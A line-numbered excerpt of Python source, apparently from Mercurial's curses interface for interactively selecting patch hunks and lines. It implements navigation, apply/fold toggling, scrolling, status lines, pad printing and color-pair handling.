784 781 while nextitem is not None and not sametype(nextitem):
785 782 nextitem = nextitem.nextitem()
786 783
787 784 if nextitem is None:
788 785 nextitem = currentitem
789 786 else:
790 787 parent = nextitem.parentitem()
791 788 if parent is not None and parent.folded:
792 789 self.togglefolded(parent)
793 790
794 791 self.currentselecteditem = nextitem
795 792 if not test:
796 793 self.recenterdisplayedarea()
797 794
798 795 def rightarrowevent(self):
799 796 """
800 797 select (if possible) the first of this item's child-items.
801 798 """
802 799 currentitem = self.currentselecteditem
803 800 nextitem = currentitem.firstchild()
804 801
805 802 # turn off folding if we want to show a child-item
806 803 if currentitem.folded:
807 804 self.togglefolded(currentitem)
808 805
809 806 if nextitem is None:
810 807 # if the item has no children, then no change...
811 808 nextitem = currentitem
812 809
813 810 self.currentselecteditem = nextitem
814 811
815 812 def leftarrowevent(self):
816 813 """
817 814 if the current item can be folded (i.e. it is an unfolded header or
818 815 hunk), then fold it. otherwise try select (if possible) the parent
819 816 of this item.
820 817 """
821 818 currentitem = self.currentselecteditem
822 819
823 820 # try to fold the item
824 821 if not isinstance(currentitem, uihunkline):
825 822 if not currentitem.folded:
826 823 self.togglefolded(item=currentitem)
827 824 return
828 825
829 826 # if it can't be folded, try to select the parent item
830 827 nextitem = currentitem.parentitem()
831 828
832 829 if nextitem is None:
833 830 # if no item on parent-level, then no change...
834 831 nextitem = currentitem
835 832 if not nextitem.folded:
836 833 self.togglefolded(item=nextitem)
837 834
838 835 self.currentselecteditem = nextitem
839 836
840 837 def leftarrowshiftevent(self):
841 838 """
842 839 select the header of the current item (or fold current item if the
843 840 current item is already a header).
844 841 """
845 842 currentitem = self.currentselecteditem
846 843
847 844 if isinstance(currentitem, uiheader):
848 845 if not currentitem.folded:
849 846 self.togglefolded(item=currentitem)
850 847 return
851 848
852 849 # select the parent item recursively until we're at a header
853 850 while True:
854 851 nextitem = currentitem.parentitem()
855 852 if nextitem is None:
856 853 break
857 854 else:
858 855 currentitem = nextitem
859 856
860 857 self.currentselecteditem = currentitem
861 858
862 859 def updatescroll(self):
863 860 """scroll the screen to fully show the currently-selected"""
864 861 selstart = self.selecteditemstartline
865 862 selend = self.selecteditemendline
866 863
867 864 padstart = self.firstlineofpadtoprint
868 865 padend = padstart + self.yscreensize - self.numstatuslines - 1
869 866 # 'buffered' pad start/end values which scroll with a certain
870 867 # top/bottom context margin
871 868 padstartbuffered = padstart + 3
872 869 padendbuffered = padend - 3
873 870
874 871 if selend > padendbuffered:
875 872 self.scrolllines(selend - padendbuffered)
876 873 elif selstart < padstartbuffered:
877 874 # negative values scroll in pgup direction
878 875 self.scrolllines(selstart - padstartbuffered)
879 876
880 877 def scrolllines(self, numlines):
881 878 """scroll the screen up (down) by numlines when numlines >0 (<0)."""
882 879 self.firstlineofpadtoprint += numlines
883 880 if self.firstlineofpadtoprint < 0:
884 881 self.firstlineofpadtoprint = 0
885 882 if self.firstlineofpadtoprint > self.numpadlines - 1:
886 883 self.firstlineofpadtoprint = self.numpadlines - 1
887 884
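To make the buffered-scroll arithmetic in updatescroll() and scrolllines() concrete, here is a small worked example with invented numbers: a 30-row screen, one status line, and a pad currently starting at row 100.

    padstart, yscreensize, numstatuslines = 100, 30, 1
    padend = padstart + yscreensize - numstatuslines - 1          # 128
    padstartbuffered, padendbuffered = padstart + 3, padend - 3   # 103 and 125
    selend = 130                      # selected item ends below the bottom margin
    print(selend - padendbuffered)    # -> 5, i.e. scrolllines(5) scrolls down five rows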
888 885 def toggleapply(self, item=None):
889 886 """
890 887 toggle the applied flag of the specified item. if no item is specified,
891 888 toggle the flag of the currently selected item.
892 889 """
893 890 if item is None:
894 891 item = self.currentselecteditem
895 892 # Only set this when NOT using 'toggleall'
896 893 self.lastapplieditem = item
897 894
898 895 item.applied = not item.applied
899 896
900 897 if isinstance(item, uiheader):
901 898 item.partial = False
902 899 if item.applied:
903 900 # apply all its hunks
904 901 for hnk in item.hunks:
905 902 hnk.applied = True
906 903 # apply all their hunklines
907 904 for hunkline in hnk.changedlines:
908 905 hunkline.applied = True
909 906 else:
910 907 # un-apply all its hunks
911 908 for hnk in item.hunks:
912 909 hnk.applied = False
913 910 hnk.partial = False
914 911 # un-apply all their hunklines
915 912 for hunkline in hnk.changedlines:
916 913 hunkline.applied = False
917 914 elif isinstance(item, uihunk):
918 915 item.partial = False
919 916 # apply all its hunklines
920 917 for hunkline in item.changedlines:
921 918 hunkline.applied = item.applied
922 919
923 920 siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
924 921 allsiblingsapplied = not (False in siblingappliedstatus)
925 922 nosiblingsapplied = not (True in siblingappliedstatus)
926 923
927 924 siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
928 925 somesiblingspartial = True in siblingspartialstatus
929 926
930 927 # cases where applied or partial should be removed from header
931 928
932 929 # if no 'sibling' hunks are applied (including this hunk)
933 930 if nosiblingsapplied:
934 931 if not item.header.special():
935 932 item.header.applied = False
936 933 item.header.partial = False
937 934 else: # some/all parent siblings are applied
938 935 item.header.applied = True
939 936 item.header.partial = (
940 937 somesiblingspartial or not allsiblingsapplied
941 938 )
942 939
943 940 elif isinstance(item, uihunkline):
944 941 siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
945 942 allsiblingsapplied = not (False in siblingappliedstatus)
946 943 nosiblingsapplied = not (True in siblingappliedstatus)
947 944
948 945 # if no 'sibling' lines are applied
949 946 if nosiblingsapplied:
950 947 item.hunk.applied = False
951 948 item.hunk.partial = False
952 949 elif allsiblingsapplied:
953 950 item.hunk.applied = True
954 951 item.hunk.partial = False
955 952 else: # some siblings applied
956 953 item.hunk.applied = True
957 954 item.hunk.partial = True
958 955
959 956 parentsiblingsapplied = [
960 957 hnk.applied for hnk in item.hunk.header.hunks
961 958 ]
962 959 noparentsiblingsapplied = not (True in parentsiblingsapplied)
963 960 allparentsiblingsapplied = not (False in parentsiblingsapplied)
964 961
965 962 parentsiblingspartial = [
966 963 hnk.partial for hnk in item.hunk.header.hunks
967 964 ]
968 965 someparentsiblingspartial = True in parentsiblingspartial
969 966
970 967 # if all parent hunks are not applied, un-apply header
971 968 if noparentsiblingsapplied:
972 969 if not item.hunk.header.special():
973 970 item.hunk.header.applied = False
974 971 item.hunk.header.partial = False
975 972 # set the applied and partial status of the header if needed
976 973 else: # some/all parent siblings are applied
977 974 item.hunk.header.applied = True
978 975 item.hunk.header.partial = (
979 976 someparentsiblingspartial or not allparentsiblingsapplied
980 977 )
981 978
982 979 def toggleall(self):
983 980 """toggle the applied flag of all items."""
984 981 if self.waslasttoggleallapplied: # then unapply them this time
985 982 for item in self.headerlist:
986 983 if item.applied:
987 984 self.toggleapply(item)
988 985 else:
989 986 for item in self.headerlist:
990 987 if not item.applied:
991 988 self.toggleapply(item)
992 989 self.waslasttoggleallapplied = not self.waslasttoggleallapplied
993 990
994 991 def flipselections(self):
995 992 """
996 993 Flip all selections. Every selected line is unselected and vice
997 994 versa.
998 995 """
999 996 for header in self.headerlist:
1000 997 for hunk in header.allchildren():
1001 998 for line in hunk.allchildren():
1002 999 self.toggleapply(line)
1003 1000
1004 1001 def toggleallbetween(self):
1005 1002 """toggle applied on or off for all items in range [lastapplied,
1006 1003 current]. """
1007 1004 if (
1008 1005 not self.lastapplieditem
1009 1006 or self.currentselecteditem == self.lastapplieditem
1010 1007 ):
1011 1008 # Treat this like a normal 'x'/' '
1012 1009 self.toggleapply()
1013 1010 return
1014 1011
1015 1012 startitem = self.lastapplieditem
1016 1013 enditem = self.currentselecteditem
1017 1014 # Verify that enditem is "after" startitem, otherwise swap them.
1018 1015 for direction in [b'forward', b'reverse']:
1019 1016 nextitem = startitem.nextitem()
1020 1017 while nextitem and nextitem != enditem:
1021 1018 nextitem = nextitem.nextitem()
1022 1019 if nextitem:
1023 1020 break
1024 1021 # Looks like we went the wrong direction :)
1025 1022 startitem, enditem = enditem, startitem
1026 1023
1027 1024 if not nextitem:
1028 1025 # We didn't find a path going either forward or backward? Don't know
1029 1026 # how this can happen, let's not crash though.
1030 1027 return
1031 1028
1032 1029 nextitem = startitem
1033 1030 # Switch all items to be the opposite state of the currently selected
1034 1031 # item. Specifically:
1035 1032 # [ ] startitem
1036 1033 # [x] middleitem
1037 1034 # [ ] enditem <-- currently selected
1038 1035 # This will turn all three on, since the currently selected item is off.
1039 1036 # This does *not* invert each item (i.e. middleitem stays marked/on)
1040 1037 desiredstate = not self.currentselecteditem.applied
1041 1038 while nextitem != enditem.nextitem():
1042 1039 if nextitem.applied != desiredstate:
1043 1040 self.toggleapply(item=nextitem)
1044 1041 nextitem = nextitem.nextitem()
1045 1042
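In other words, pressing 'X' (see handlekeypressed() further down) gives every item between the last individually toggled item and the current one the state opposite to the current item's state, rather than inverting each item separately. A tiny list-based analogue of that rule, matching the [ ]/[x]/[ ] example in the comments above:

    # booleans stand in for the 'applied' flags; the last entry is selected
    items = [False, True, False]
    desired = not items[-1]              # opposite of the selected item -> True
    items = [desired for _ in items]     # all three end up selected
    assert items == [True, True, True]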
1046 1043 def togglefolded(self, item=None, foldparent=False):
1047 1044 """toggle folded flag of specified item (defaults to currently
1048 1045 selected)"""
1049 1046 if item is None:
1050 1047 item = self.currentselecteditem
1051 1048 if foldparent or (isinstance(item, uiheader) and item.neverunfolded):
1052 1049 if not isinstance(item, uiheader):
1053 1050 # we need to select the parent item in this case
1054 1051 self.currentselecteditem = item = item.parentitem()
1055 1052 elif item.neverunfolded:
1056 1053 item.neverunfolded = False
1057 1054
1058 1055 # also fold any foldable children of the parent/current item
1059 1056 if isinstance(item, uiheader): # the original or 'new' item
1060 1057 for child in item.allchildren():
1061 1058 child.folded = not item.folded
1062 1059
1063 1060 if isinstance(item, (uiheader, uihunk)):
1064 1061 item.folded = not item.folded
1065 1062
1066 1063 def alignstring(self, instr, window):
1067 1064 """
1068 1065 add whitespace to the end of a string in order to make it fill
1069 1066 the screen in the x direction. the current cursor position is
1070 1067 taken into account when making this calculation. the string can span
1071 1068 multiple lines.
1072 1069 """
1073 1070 y, xstart = window.getyx()
1074 1071 width = self.xscreensize
1075 1072 # turn tabs into spaces
1076 1073 instr = instr.expandtabs(4)
1077 1074 strwidth = encoding.colwidth(instr)
1078 1075 numspaces = width - ((strwidth + xstart) % width)
1079 1076 return instr + b" " * numspaces
1080 1077
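A quick numeric illustration of the padding computed by alignstring(), assuming an 80-column screen, a cursor already at column 10, and a pure-ASCII string (so encoding.colwidth() equals len()):

    width, xstart = 80, 10
    instr = b"hello"
    numspaces = width - ((len(instr) + xstart) % width)   # 80 - 15 = 65
    padded = instr + b" " * numspaces
    assert (xstart + len(padded)) % width == 0            # the next write starts a new pad row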
1081 1078 def printstring(
1082 1079 self,
1083 1080 window,
1084 1081 text,
1085 1082 fgcolor=None,
1086 1083 bgcolor=None,
1087 1084 pair=None,
1088 1085 pairname=None,
1089 1086 attrlist=None,
1090 1087 towin=True,
1091 1088 align=True,
1092 1089 showwhtspc=False,
1093 1090 ):
1094 1091 """
1095 1092 print the string, text, with the specified colors and attributes, to
1096 1093 the specified curses window object.
1097 1094
1098 1095 the foreground and background colors are of the form
1099 1096 curses.color_xxxx, where xxxx is one of: [black, blue, cyan, green,
1100 1097 magenta, red, white, yellow]. if pairname is provided, a color
1101 1098 pair will be looked up in the self.colorpairnames dictionary.
1102 1099
1103 1100 attrlist is a list containing text attributes in the form of
1104 1101 curses.a_xxxx, where xxxx can be: [bold, dim, normal, standout,
1105 1102 underline].
1106 1103
1107 1104 if align == True, whitespace is added to the printed string such that
1108 1105 the string stretches to the right border of the window.
1109 1106
1110 1107 if showwhtspc == True, trailing whitespace of a string is highlighted.
1111 1108 """
1112 1109 # preprocess the text, converting tabs to spaces
1113 1110 text = text.expandtabs(4)
1114 1111 # strip \n, and convert control characters to ^[char] representation
1115 1112 text = re.sub(
1116 1113 br'[\x00-\x08\x0a-\x1f]',
1117 1114 lambda m: b'^' + pycompat.sysbytes(chr(ord(m.group()) + 64)),
1118 1115 text.strip(b'\n'),
1119 1116 )
1120 1117
1121 1118 if pair is not None:
1122 1119 colorpair = pair
1123 1120 elif pairname is not None:
1124 1121 colorpair = self.colorpairnames[pairname]
1125 1122 else:
1126 1123 if fgcolor is None:
1127 1124 fgcolor = -1
1128 1125 if bgcolor is None:
1129 1126 bgcolor = -1
1130 1127 if (fgcolor, bgcolor) in self.colorpairs:
1131 1128 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1132 1129 else:
1133 1130 colorpair = self.getcolorpair(fgcolor, bgcolor)
1134 1131 # add attributes if possible
1135 1132 if attrlist is None:
1136 1133 attrlist = []
1137 1134 if colorpair < 256:
1138 1135 # then it is safe to apply all attributes
1139 1136 for textattr in attrlist:
1140 1137 colorpair |= textattr
1141 1138 else:
1142 1139 # just apply a select few (safe?) attributes
1143 1140 for textattr in (curses.A_UNDERLINE, curses.A_BOLD):
1144 1141 if textattr in attrlist:
1145 1142 colorpair |= textattr
1146 1143
1147 1144 y, xstart = self.chunkpad.getyx()
1148 1145 t = b"" # variable for counting lines printed
1149 1146 # if requested, show trailing whitespace
1150 1147 if showwhtspc:
1151 1148 origlen = len(text)
1152 1149 text = text.rstrip(b' \n') # tabs have already been expanded
1153 1150 strippedlen = len(text)
1154 1151 numtrailingspaces = origlen - strippedlen
1155 1152
1156 1153 if towin:
1157 1154 window.addstr(text, colorpair)
1158 1155 t += text
1159 1156
1160 1157 if showwhtspc:
1161 1158 wscolorpair = colorpair | curses.A_REVERSE
1162 1159 if towin:
1163 1160 for i in range(numtrailingspaces):
1164 1161 window.addch(curses.ACS_CKBOARD, wscolorpair)
1165 1162 t += b" " * numtrailingspaces
1166 1163
1167 1164 if align:
1168 1165 if towin:
1169 1166 extrawhitespace = self.alignstring(b"", window)
1170 1167 window.addstr(extrawhitespace, colorpair)
1171 1168 else:
1172 1169 # need to use t, since the x position hasn't incremented
1173 1170 extrawhitespace = self.alignstring(t, window)
1174 1171 t += extrawhitespace
1175 1172
1176 1173 # self.linesprintedtopadsofar is reset to 0 at the beginning of printitem()
1177 1174
1178 1175 linesprinted = (xstart + len(t)) // self.xscreensize
1179 1176 self.linesprintedtopadsofar += linesprinted
1180 1177 return t
1181 1178
1182 1179 def _getstatuslinesegments(self):
1183 1180 """-> [str]. return segments"""
1184 1181 selected = self.currentselecteditem.applied
1185 1182 spaceselect = _(b'space/enter: select')
1186 1183 spacedeselect = _(b'space/enter: deselect')
1187 1184 # Pad the selected label to the length of the longer of the two
1188 1185 # possible labels. This may vary by language.
1189 1186 spacelen = max(len(spaceselect), len(spacedeselect))
1190 1187 selectedlabel = b'%-*s' % (
1191 1188 spacelen,
1192 1189 spacedeselect if selected else spaceselect,
1193 1190 )
1194 1191 segments = [
1195 1192 _headermessages[self.operation],
1196 1193 b'-',
1197 1194 _(b'[x]=selected **=collapsed'),
1198 1195 _(b'c: confirm'),
1199 1196 _(b'q: abort'),
1200 1197 _(b'arrow keys: move/expand/collapse'),
1201 1198 selectedlabel,
1202 1199 _(b'?: help'),
1203 1200 ]
1204 1201 return segments
1205 1202
1206 1203 def _getstatuslines(self):
1207 1204 """() -> [str]. return short help used in the top status window"""
1208 1205 if self.errorstr is not None:
1209 1206 lines = [self.errorstr, _(b'Press any key to continue')]
1210 1207 else:
1211 1208 # wrap segments to lines
1212 1209 segments = self._getstatuslinesegments()
1213 1210 width = self.xscreensize
1214 1211 lines = []
1215 1212 lastwidth = width
1216 1213 for s in segments:
1217 1214 w = encoding.colwidth(s)
1218 1215 sep = b' ' * (1 + (s and s[0] not in b'-['))
1219 1216 if lastwidth + w + len(sep) >= width:
1220 1217 lines.append(s)
1221 1218 lastwidth = w
1222 1219 else:
1223 1220 lines[-1] += sep + s
1224 1221 lastwidth += w + len(sep)
1225 1222 if len(lines) != self.numstatuslines:
1226 1223 self.numstatuslines = len(lines)
1227 1224 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1228 1225 return [stringutil.ellipsis(l, self.xscreensize - 1) for l in lines]
1229 1226
1230 1227 def updatescreen(self):
1231 1228 self.statuswin.erase()
1232 1229 self.chunkpad.erase()
1233 1230
1234 1231 printstring = self.printstring
1235 1232
1236 1233 # print out the status lines at the top
1237 1234 try:
1238 1235 for line in self._getstatuslines():
1239 1236 printstring(self.statuswin, line, pairname=b"legend")
1240 1237 self.statuswin.refresh()
1241 1238 except curses.error:
1242 1239 pass
1243 1240 if self.errorstr is not None:
1244 1241 return
1245 1242
1246 1243 # print out the patch in the remaining part of the window
1247 1244 try:
1248 1245 self.printitem()
1249 1246 self.updatescroll()
1250 1247 self.chunkpad.refresh(
1251 1248 self.firstlineofpadtoprint,
1252 1249 0,
1253 1250 self.numstatuslines,
1254 1251 0,
1255 1252 self.yscreensize - self.numstatuslines,
1256 1253 self.xscreensize,
1257 1254 )
1258 1255 except curses.error:
1259 1256 pass
1260 1257
1261 1258 def getstatusprefixstring(self, item):
1262 1259 """
1263 1260 create a string to prefix a line with which indicates whether 'item'
1264 1261 is applied and/or folded.
1265 1262 """
1266 1263
1267 1264 # create checkbox string
1268 1265 if item.applied:
1269 1266 if not isinstance(item, uihunkline) and item.partial:
1270 1267 checkbox = b"[~]"
1271 1268 else:
1272 1269 checkbox = b"[x]"
1273 1270 else:
1274 1271 checkbox = b"[ ]"
1275 1272
1276 1273 try:
1277 1274 if item.folded:
1278 1275 checkbox += b"**"
1279 1276 if isinstance(item, uiheader):
1280 1277 # one of "m", "a", or "d" (modified, added, deleted)
1281 1278 filestatus = item.changetype
1282 1279
1283 1280 checkbox += filestatus + b" "
1284 1281 else:
1285 1282 checkbox += b" "
1286 1283 if isinstance(item, uiheader):
1287 1284 # add two more spaces for headers
1288 1285 checkbox += b" "
1289 1286 except AttributeError: # not foldable
1290 1287 checkbox += b" "
1291 1288
1292 1289 return checkbox
1293 1290
1294 1291 def printheader(
1295 1292 self, header, selected=False, towin=True, ignorefolding=False
1296 1293 ):
1297 1294 """
1298 1295 print the header to the pad. if towin is False, don't print anything
1299 1296 to the window, but still return the string that would have been printed.
1300 1297 """
1301 1298
1302 1299 outstr = b""
1303 1300 text = header.prettystr()
1304 1301 chunkindex = self.chunklist.index(header)
1305 1302
1306 1303 if chunkindex != 0 and not header.folded:
1307 1304 # add separating line before headers
1308 1305 outstr += self.printstring(
1309 1306 self.chunkpad, b'_' * self.xscreensize, towin=towin, align=False
1310 1307 )
1311 1308 # select color-pair based on if the header is selected
1312 1309 colorpair = self.getcolorpair(
1313 1310 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1314 1311 )
1315 1312
1316 1313 # print out each line of the chunk, expanding it to screen width
1317 1314
1318 1315 # number of characters to indent lines on this level by
1319 1316 indentnumchars = 0
1320 1317 checkbox = self.getstatusprefixstring(header)
1321 1318 if not header.folded or ignorefolding:
1322 1319 textlist = text.split(b"\n")
1323 1320 linestr = checkbox + textlist[0]
1324 1321 else:
1325 1322 linestr = checkbox + header.filename()
1326 1323 outstr += self.printstring(
1327 1324 self.chunkpad, linestr, pair=colorpair, towin=towin
1328 1325 )
1329 1326 if not header.folded or ignorefolding:
1330 1327 if len(textlist) > 1:
1331 1328 for line in textlist[1:]:
1332 1329 linestr = b" " * (indentnumchars + len(checkbox)) + line
1333 1330 outstr += self.printstring(
1334 1331 self.chunkpad, linestr, pair=colorpair, towin=towin
1335 1332 )
1336 1333
1337 1334 return outstr
1338 1335
1339 1336 def printhunklinesbefore(
1340 1337 self, hunk, selected=False, towin=True, ignorefolding=False
1341 1338 ):
1342 1339 """includes start/end line indicator"""
1343 1340 outstr = b""
1344 1341 # where hunk is in list of siblings
1345 1342 hunkindex = hunk.header.hunks.index(hunk)
1346 1343
1347 1344 if hunkindex != 0:
1348 1345 # add separating line before headers
1349 1346 outstr += self.printstring(
1350 1347 self.chunkpad, b' ' * self.xscreensize, towin=towin, align=False
1351 1348 )
1352 1349
1353 1350 colorpair = self.getcolorpair(
1354 1351 name=selected and b"selected" or b"normal", attrlist=[curses.A_BOLD]
1355 1352 )
1356 1353
1357 1354 # print out from-to line with checkbox
1358 1355 checkbox = self.getstatusprefixstring(hunk)
1359 1356
1360 1357 lineprefix = b" " * self.hunkindentnumchars + checkbox
1361 1358 frtoline = b" " + hunk.getfromtoline().strip(b"\n")
1362 1359
1363 1360 outstr += self.printstring(
1364 1361 self.chunkpad, lineprefix, towin=towin, align=False
1365 1362 ) # add uncolored checkbox/indent
1366 1363 outstr += self.printstring(
1367 1364 self.chunkpad, frtoline, pair=colorpair, towin=towin
1368 1365 )
1369 1366
1370 1367 if hunk.folded and not ignorefolding:
1371 1368 # skip remainder of output
1372 1369 return outstr
1373 1370
1374 1371 # print out lines of the chunk preceding changed-lines
1375 1372 for line in hunk.before:
1376 1373 linestr = (
1377 1374 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1378 1375 )
1379 1376 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1380 1377
1381 1378 return outstr
1382 1379
1383 1380 def printhunklinesafter(self, hunk, towin=True, ignorefolding=False):
1384 1381 outstr = b""
1385 1382 if hunk.folded and not ignorefolding:
1386 1383 return outstr
1387 1384
1388 1385 # a bit superfluous, but to avoid hard-coding indent amount
1389 1386 checkbox = self.getstatusprefixstring(hunk)
1390 1387 for line in hunk.after:
1391 1388 linestr = (
1392 1389 b" " * (self.hunklineindentnumchars + len(checkbox)) + line
1393 1390 )
1394 1391 outstr += self.printstring(self.chunkpad, linestr, towin=towin)
1395 1392
1396 1393 return outstr
1397 1394
1398 1395 def printhunkchangedline(self, hunkline, selected=False, towin=True):
1399 1396 outstr = b""
1400 1397 checkbox = self.getstatusprefixstring(hunkline)
1401 1398
1402 1399 linestr = hunkline.prettystr().strip(b"\n")
1403 1400
1404 1401 # select color-pair based on whether line is an addition/removal
1405 1402 if selected:
1406 1403 colorpair = self.getcolorpair(name=b"selected")
1407 1404 elif linestr.startswith(b"+"):
1408 1405 colorpair = self.getcolorpair(name=b"addition")
1409 1406 elif linestr.startswith(b"-"):
1410 1407 colorpair = self.getcolorpair(name=b"deletion")
1411 1408 elif linestr.startswith(b"\\"):
1412 1409 colorpair = self.getcolorpair(name=b"normal")
1413 1410
1414 1411 lineprefix = b" " * self.hunklineindentnumchars + checkbox
1415 1412 outstr += self.printstring(
1416 1413 self.chunkpad, lineprefix, towin=towin, align=False
1417 1414 ) # add uncolored checkbox/indent
1418 1415 outstr += self.printstring(
1419 1416 self.chunkpad, linestr, pair=colorpair, towin=towin, showwhtspc=True
1420 1417 )
1421 1418 return outstr
1422 1419
1423 1420 def printitem(
1424 1421 self, item=None, ignorefolding=False, recursechildren=True, towin=True
1425 1422 ):
1426 1423 """
1427 1424 use __printitem() to print the specified item.
1428 1425 if item is not specified, then print the entire patch.
1429 1426 (hiding folded elements, etc. -- see __printitem() docstring)
1430 1427 """
1431 1428
1432 1429 if item is None:
1433 1430 item = self.headerlist
1434 1431 if recursechildren:
1435 1432 self.linesprintedtopadsofar = 0
1436 1433
1437 1434 outstr = []
1438 1435 self.__printitem(
1439 1436 item, ignorefolding, recursechildren, outstr, towin=towin
1440 1437 )
1441 1438 return b''.join(outstr)
1442 1439
1443 1440 def outofdisplayedarea(self):
1444 1441 y, _ = self.chunkpad.getyx() # cursor location
1445 1442 # * 2 here works, but an optimization would be to use the maximum number
1446 1443 # of consecutive non-selectable lines, i.e. the maximum number of context
1447 1444 # lines for any hunk in the patch
1448 1445 miny = min(0, self.firstlineofpadtoprint - self.yscreensize)
1449 1446 maxy = self.firstlineofpadtoprint + self.yscreensize * 2
1450 1447 return y < miny or y > maxy
1451 1448
1452 1449 def handleselection(self, item, recursechildren):
1453 1450 selected = item is self.currentselecteditem
1454 1451 if selected and recursechildren:
1455 1452 # assumes line numbering starting from line 0
1456 1453 self.selecteditemstartline = self.linesprintedtopadsofar
1457 1454 selecteditemlines = self.getnumlinesdisplayed(
1458 1455 item, recursechildren=False
1459 1456 )
1460 1457 self.selecteditemendline = (
1461 1458 self.selecteditemstartline + selecteditemlines - 1
1462 1459 )
1463 1460 return selected
1464 1461
1465 1462 def __printitem(
1466 1463 self, item, ignorefolding, recursechildren, outstr, towin=True
1467 1464 ):
1468 1465 """
1469 1466 recursive method for printing out patch/header/hunk/hunk-line data to
1470 1467 screen. also returns a string with all of the content of the displayed
1471 1468 patch (not including coloring, etc.).
1472 1469
1473 1470 if ignorefolding is True, then folded items are printed out.
1474 1471
1475 1472 if recursechildren is False, then only print the item without its
1476 1473 child items.
1477 1474 """
1478 1475
1479 1476 if towin and self.outofdisplayedarea():
1480 1477 return
1481 1478
1482 1479 selected = self.handleselection(item, recursechildren)
1483 1480
1484 1481 # patch object is a list of headers
1485 1482 if isinstance(item, patch):
1486 1483 if recursechildren:
1487 1484 for hdr in item:
1488 1485 self.__printitem(
1489 1486 hdr, ignorefolding, recursechildren, outstr, towin
1490 1487 )
1491 1488 # todo: eliminate all isinstance() calls
1492 1489 if isinstance(item, uiheader):
1493 1490 outstr.append(
1494 1491 self.printheader(
1495 1492 item, selected, towin=towin, ignorefolding=ignorefolding
1496 1493 )
1497 1494 )
1498 1495 if recursechildren:
1499 1496 for hnk in item.hunks:
1500 1497 self.__printitem(
1501 1498 hnk, ignorefolding, recursechildren, outstr, towin
1502 1499 )
1503 1500 elif isinstance(item, uihunk) and (
1504 1501 (not item.header.folded) or ignorefolding
1505 1502 ):
1506 1503 # print the hunk data which comes before the changed-lines
1507 1504 outstr.append(
1508 1505 self.printhunklinesbefore(
1509 1506 item, selected, towin=towin, ignorefolding=ignorefolding
1510 1507 )
1511 1508 )
1512 1509 if recursechildren:
1513 1510 for l in item.changedlines:
1514 1511 self.__printitem(
1515 1512 l, ignorefolding, recursechildren, outstr, towin
1516 1513 )
1517 1514 outstr.append(
1518 1515 self.printhunklinesafter(
1519 1516 item, towin=towin, ignorefolding=ignorefolding
1520 1517 )
1521 1518 )
1522 1519 elif isinstance(item, uihunkline) and (
1523 1520 (not item.hunk.folded) or ignorefolding
1524 1521 ):
1525 1522 outstr.append(
1526 1523 self.printhunkchangedline(item, selected, towin=towin)
1527 1524 )
1528 1525
1529 1526 return outstr
1530 1527
1531 1528 def getnumlinesdisplayed(
1532 1529 self, item=None, ignorefolding=False, recursechildren=True
1533 1530 ):
1534 1531 """
1535 1532 return the number of lines which would be displayed if the item were
1536 1533 to be printed to the display. the item will not be printed to the
1537 1534 display (pad).
1538 1535 if no item is given, assume the entire patch.
1539 1536 if ignorefolding is True, folded items will be unfolded when counting
1540 1537 the number of lines.
1541 1538 """
1542 1539
1543 1540 # temporarily disable printing to windows by printstring
1544 1541 patchdisplaystring = self.printitem(
1545 1542 item, ignorefolding, recursechildren, towin=False
1546 1543 )
1547 1544 numlines = len(patchdisplaystring) // self.xscreensize
1548 1545 return numlines
1549 1546
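The integer division by xscreensize above relies on printstring() padding each rendered row (via alignstring()) out to an exact multiple of the screen width, so the length of the collected string directly encodes the number of pad rows. Continuing the alignstring() illustration with invented numbers:

    xscreensize = 80
    patchdisplaystring = b" " * 10 + b"hello" + b" " * 65   # one fully padded 80-column row
    assert len(patchdisplaystring) // xscreensize == 1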
1550 1547 def sigwinchhandler(self, n, frame):
1551 1548 """handle window resizing"""
1552 1549 try:
1553 1550 curses.endwin()
1554 1551 self.xscreensize, self.yscreensize = scmutil.termsize(self.ui)
1555 1552 self.statuswin.resize(self.numstatuslines, self.xscreensize)
1556 1553 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1557 1554 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1558 1555 except curses.error:
1559 1556 pass
1560 1557
1561 1558 def getcolorpair(
1562 1559 self, fgcolor=None, bgcolor=None, name=None, attrlist=None
1563 1560 ):
1564 1561 """
1565 1562 get a curses color pair, adding it to self.colorpairs if it is not
1566 1563 already defined. an optional string, name, can be passed as a shortcut
1567 1564 for referring to the color-pair. by default, if no arguments are
1568 1565 specified, the white foreground / black background color-pair is
1569 1566 returned.
1570 1567
1571 1568 it is expected that this function will be used exclusively for
1572 1569 initializing color pairs, and not curses.init_pair().
1573 1570
1574 1571 attrlist is used to 'flavor' the returned color-pair. this information
1575 1572 is not stored in self.colorpairs. it contains attribute values like
1576 1573 curses.A_BOLD.
1577 1574 """
1578 1575
1579 1576 if (name is not None) and name in self.colorpairnames:
1580 1577 # then get the associated color pair and return it
1581 1578 colorpair = self.colorpairnames[name]
1582 1579 else:
1583 1580 if fgcolor is None:
1584 1581 fgcolor = -1
1585 1582 if bgcolor is None:
1586 1583 bgcolor = -1
1587 1584 if (fgcolor, bgcolor) in self.colorpairs:
1588 1585 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1589 1586 else:
1590 1587 pairindex = len(self.colorpairs) + 1
1591 1588 if self.usecolor:
1592 1589 curses.init_pair(pairindex, fgcolor, bgcolor)
1593 1590 colorpair = self.colorpairs[
1594 1591 (fgcolor, bgcolor)
1595 1592 ] = curses.color_pair(pairindex)
1596 1593 if name is not None:
1597 1594 self.colorpairnames[name] = curses.color_pair(pairindex)
1598 1595 else:
1599 1596 cval = 0
1600 1597 if name is not None:
1601 1598 if name == b'selected':
1602 1599 cval = curses.A_REVERSE
1603 1600 self.colorpairnames[name] = cval
1604 1601 colorpair = self.colorpairs[(fgcolor, bgcolor)] = cval
1605 1602
1606 1603 # add attributes if possible
1607 1604 if attrlist is None:
1608 1605 attrlist = []
1609 1606 if colorpair < 256:
1610 1607 # then it is safe to apply all attributes
1611 1608 for textattr in attrlist:
1612 1609 colorpair |= textattr
1613 1610 else:
1614 1611 # just apply a select few (safe?) attributes
1615 1612 for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
1616 1613 if textattrib in attrlist:
1617 1614 colorpair |= textattrib
1618 1615 return colorpair
